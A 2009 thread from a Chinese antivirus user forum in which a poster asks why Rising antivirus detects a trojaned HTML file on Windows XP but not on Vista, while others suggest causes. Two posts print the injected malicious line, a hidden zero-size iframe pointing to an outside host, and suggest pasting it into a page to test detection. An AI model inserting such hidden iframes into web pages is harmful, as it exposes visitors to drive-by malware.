同一瑞星在不同电脑上对同样被挂马的HTML文件的杀毒结果不一样 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛个人产品讨论区 瑞星杀毒软件 瑞星杀毒软件2011 同一瑞星在不同电脑上对同样被挂马的HTML文件的杀毒结果不一样

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[求助] 同一瑞星在不同电脑上对同样被挂马的HTML文件的杀毒结果不一样

不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:	发表于： 2009-12-21 20:30 \| 显示全部短消息资料字号：小中大 1楼同一瑞星在不同电脑上对同样被挂马的HTML文件的杀毒结果不一样瑞星2010版，已升级到最新版，分别在两台电脑上安装（不同序列号），一台是Vista（正版，笔记本自带），一台是WinXP，检查了瑞星的设置，对照看都一样，皆为管理员登录、专业模式、手动查杀设置的最高级。有个目录下的html文件多个，HTML代码里都被加了iframe挂马，在Vista那台机器上手工查杀没有病毒，在WinXP那台电脑上检测出未知病毒并去掉了iframe里的挂马网站地址。为啥Vista那边查不出来“病毒”呢？ ----------------------------- 补充说明，是同样的、确认有挂马的iframe的HTML文件，分别拷在Vista和XP下。用户系统信息：Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729) 不能飚车最后编辑于 2009-12-23 12:40:42
不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:	分享到：

不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:	发表于： 2009-12-21 20:32 \| 显示全部短消息资料字号：小中大 2楼回复：同一瑞星在不同电脑上杀毒结果不一样 <IFRAME SRC="http://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME> ------------------------------ 挂马HTML如上，WinXP上的瑞星将其报为病毒并去掉了其中的地址，改为 <IFRAME WIDTH=0 HEIGHT=0></IFRAME> 而Vista上的瑞星视而不见，认为没“病毒”。
不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:

不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:	发表于： 2009-12-22 22:08 \| 显示全部短消息资料字号：小中大 3楼回复 3F 德拉克拉·零的帖子这跟设置没关系， vista那电脑没毒。杀毒是检测文件内容的特征码，xp下被挂马了，vista下没被挂马。 ------------------- 同样的被挂马的文件，不是“xp下被挂马了，vista下没被挂马”
不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:

不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:	发表于： 2009-12-22 22:08 \| 显示全部短消息资料字号：小中大 4楼回复 4F jks_风的帖子应该是由于操作系统的原因照成的，XP是32位的，VISTA是64位的。 ------------ 我这个vista也是32位的
不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:

不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:	发表于： 2009-12-23 12:33 \| 显示全部短消息资料字号：小中大 5楼回复 10F networkedition 的帖子 lz是如何判断vista哪台电脑是否中毒，如确认vista电脑和xp电脑都中毒，请查看vista电脑上的html文件是否和xp电脑上的一样，被写入恶意链接地址 -------------------------------------------- 肯定是这样判断了我才来发贴的啥再明确一下，同样的HTML文件，多个，里面都被写入了挂马的iframe，复制到vista和xp下（今天又试了在win2003里），在vista里没有查出来这几个文件被挂马，而xp和win2003里就查出来了，都是一样最新版的瑞星
不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:

不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:	发表于： 2009-12-23 12:36 \| 显示全部短消息资料字号：小中大 6楼回复 9F jks_风的帖子不知是特征码吧，还有内存查杀的，这就奇怪了？ oh，HTML文件。。。汗，你试试打开下不就知道了么。。。我无语。。。 --------------------------------- 就是打开看了才知道的啥，不然我咋知道vista下瑞星没有查出来毒呢？
不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:

不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:	发表于： 2009-12-25 15:21 \| 显示全部短消息资料字号：小中大 7楼回复：同一瑞星在不同电脑上对同样被挂马的HTML文件的杀毒结果不一样自己顶一下，等瑞星升级
不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:

不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:	发表于： 2010-01-02 14:25 \| 显示全部短消息资料字号：小中大 8楼回复: 同一瑞星在不同电脑上对同样被挂马的HTML文件的杀毒结果不一样引用: 原帖由 networkedition 于 2009-12-25 15:25:00 发表发个vista下查杀不报的截图，和xp下查杀同一文件报毒的截图，还有把文件也一并打包发送上来。 ps：病毒库的版本都一样吧？详细的操作系统类型，瑞星杀毒软件版本。很简单，你可以自己建一个HTML文件，或者网上随便找一个网页保存下来，然后用文本编辑器打开，增加一行 <IFRAME SRC="http://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME> 然后用瑞星看能否杀毒啥～～～如果能杀，瑞星会把这行改为 <IFRAME WIDTH=0 HEIGHT=0></IFRAME> 并且报有病毒
不能飚车初生襁褓狮帖子:41 注册: 2007-03-15 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT